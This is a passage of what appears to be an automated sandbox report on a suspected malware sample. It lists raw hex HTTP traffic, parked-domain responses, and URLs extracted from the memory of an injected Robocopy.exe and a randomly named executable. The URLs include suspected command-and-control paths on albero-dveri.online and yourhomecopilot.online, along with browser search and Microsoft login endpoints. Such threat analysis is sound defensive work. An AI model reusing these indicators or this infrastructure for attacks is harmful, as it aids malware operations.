07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:39:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:39:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:39:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Yourhomecopilot.online
          Source: dgGgsACWgP.exe, 00000007.00000002.4792153711.0000000005815000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.albero-dveri.online
          Source: dgGgsACWgP.exe, 00000007.00000002.4792153711.0000000005815000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.albero-dveri.online/1c4z/
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourhomecopilot.online/Ford_Pilot.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmjpDrHrT
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourhomecopilot.online/How_to_Be_a_Pilot.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8Mm
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourhomecopilot.online/Pilot_Q7.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmjpDrHrT9c
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourhomecopilot.online/Virtual_Flight.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmjpD
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourhomecopilot.online/Virtual_Flying.cfm?fp=NLyxsUnRZDXtOCJiUj0zXGIPyIGgW5siFmFqGl8MmjpD
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourhomecopilot.online/__media__/design/underconstructionnotice.php?d=yourhomecopilot.onl
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000006.00000002.4793797400.0000000007640000.00000004.00000800.00020000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourhomecopilot.online/__media__/js/trademark.php?d=yourhomecopilot.online&type=ns
          Source: Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
          Source: Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: Robocopy.exe, 00000006.00000002.4791340165.000000000612A000.00000004.10000000.00040000.00000000.sdmp, dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
          Source: dgGgsACWgP.exe, 00000007.00000002.4788186606.00000000048BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
          Source: Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: Robocopy.exe, 00000006.00000002.4793925745.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: Robocopy.exe, 00000006.00000002.4781250480.000000000074F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: Robocopy.exe, 00000006.00000002.4781250480.000000000074F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: Robocopy.exe, 00000006.00000002.4781250480.000000000074F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: Robocopy.exe, 00000006.00000002.4781250480.000000000074F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
